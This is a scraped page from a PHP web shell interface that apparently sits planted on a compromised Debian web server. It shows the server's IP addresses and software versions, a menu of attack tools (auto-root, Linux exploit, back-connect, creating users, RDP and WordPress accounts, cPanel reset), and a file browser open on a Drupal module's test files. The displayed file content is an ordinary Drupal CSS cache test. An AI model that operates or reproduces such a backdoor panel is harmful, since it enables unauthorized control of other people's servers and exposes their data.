Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.135.219.252
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools_export_test
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
context.test
1.9
KB
-rw-r--r--
css.test
3.47
KB
-rw-r--r--
css_cache.test
1.11
KB
-rw-r--r--
ctools.drush.sh
2.59
KB
-rw-r--r--
ctools.plugins.test
3.96
KB
-rw-r--r--
ctools_plugin_test.info
509
B
-rw-r--r--
ctools_plugin_test.module
1.53
KB
-rw-r--r--
math_expression.test
6.35
KB
-rw-r--r--
math_expression_stack.test
1.79
KB
-rw-r--r--
object_cache.test
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : css_cache.test
<?php /** * @file * Tests the custom CSS cache handler. */ /** * Tests the custom CSS cache handler. */ class CtoolsObjectCache extends DrupalWebTestCase { /** * {@inheritdoc} */ public static function getInfo() { return array( 'name' => 'Ctools CSS cache', 'description' => 'Tests the custom CSS cache handler.', 'group' => 'Chaos Tools Suite', ); } /** * {@inheritdoc} */ public function setUp() { parent::setUp('ctools'); } /** * Tests the custom CSS cache handler. * * @see https://drupal.org/node/1313368 */ public function testCssCache() { // Create a CSS cache entry. $filename = ctools_css_cache('body { color: red; }'); // Perform a cron run. The CSS cache entry should not be removed. $this->cronRun(); $this->assertTrue(file_exists($filename), 'The CSS cache is not cleared after performing a cron run.'); // Manually clear the caches. The CSS cache entry should be removed. drupal_flush_all_caches(); $this->assertFalse(file_exists($filename), 'The CSS cache is cleared after clearing all caches.'); } }
Close